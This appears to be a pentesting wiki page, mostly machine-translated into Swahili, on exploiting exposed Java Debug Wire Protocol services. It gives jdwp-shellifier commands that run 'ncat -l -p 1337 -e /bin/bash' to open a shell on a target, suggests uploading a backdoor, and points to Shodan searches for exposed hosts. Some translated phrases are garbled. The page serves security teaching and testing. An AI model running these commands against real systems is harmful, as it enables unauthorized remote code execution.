Exploiting

JDWP exploitation inategemea ukosefu wa uthibitisho na usimbuaji wa protokali. Kwa kawaida hupatikana kwenye bandari 8000, lakini bandari nyingine zinaweza kuwa. Muunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari lengwa. Ikiwa huduma ya JDWP inafanya kazi, inajibu kwa kutumia string ile ile, ikithibitisha uwepo wake. Hii handshake inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.

Kwa upande wa utambuzi wa mchakato, kutafuta string "jdwk" katika michakato ya Java kunaweza kuashiria kikao cha JDWP kinachofanya kazi.

Chombo kinachotumika ni jdwp-shellifier. Unaweza kukitumia na vigezo tofauti:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

I found that the use of --break-on 'java.lang.String.indexOf' make the exploit more stable. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.

More details

Hii ni muhtasari wa https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Angalia kwa maelezo zaidi.

1. JDWP Overview:

• Ni protokali ya mtandao ya binary inayotumia pakiti, hasa synchronous.

• Haina uthibitisho na usimbuaji, hivyo inakuwa hatarini inapokuwa wazi kwa mitandao ya adui.

2. JDWP Handshake:

• Mchakato rahisi wa handshake unatumika kuanzisha mawasiliano. Mstari wa ASCII wenye herufi 14 “JDWP-Handshake” unabadilishana kati ya Debugger (mteja) na Debuggee (server).

3. JDWP Communication:

• Ujumbe una muundo rahisi wenye maeneo kama Length, Id, Flag, na CommandSet.

• Thamani za CommandSet zinaanzia 0x40 hadi 0x80, zik representing hatua na matukio tofauti.

4. Exploitation:

• JDWP inaruhusu kupakia na kuita madarasa na bytecode zisizo na mipaka, ikileta hatari za usalama.

• Makala inaelezea mchakato wa unyakuzi katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka breakpoints, na kuita mbinu.

5. Real-Life Exploitation:

• Licha ya uwezekano wa ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kutumika katika hali halisi, kama inavyoonyeshwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.

• Skripti ya unyakuzi ilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Msimbo wa K remote (RCE) wa kuaminika.

6. Security Implications:

• Uwepo wa huduma za JDWP zilizo wazi kwenye mtandao unaonyesha umuhimu wa ukaguzi wa usalama wa mara kwa mara, kuzima kazi za debug katika uzalishaji, na usanidi sahihi wa firewall.

References:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]

• https://github.com/IOActive/jdwp-shellifier

• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html

• http://www.secdev.org/projects/scapy(no longer active)

• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE

• http://www.hsc-news.com/archives/2013/000109.html (no longer active)

• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt

• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults

• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html

• http://nmap.org/nsedoc/scripts/jdwp-exec.html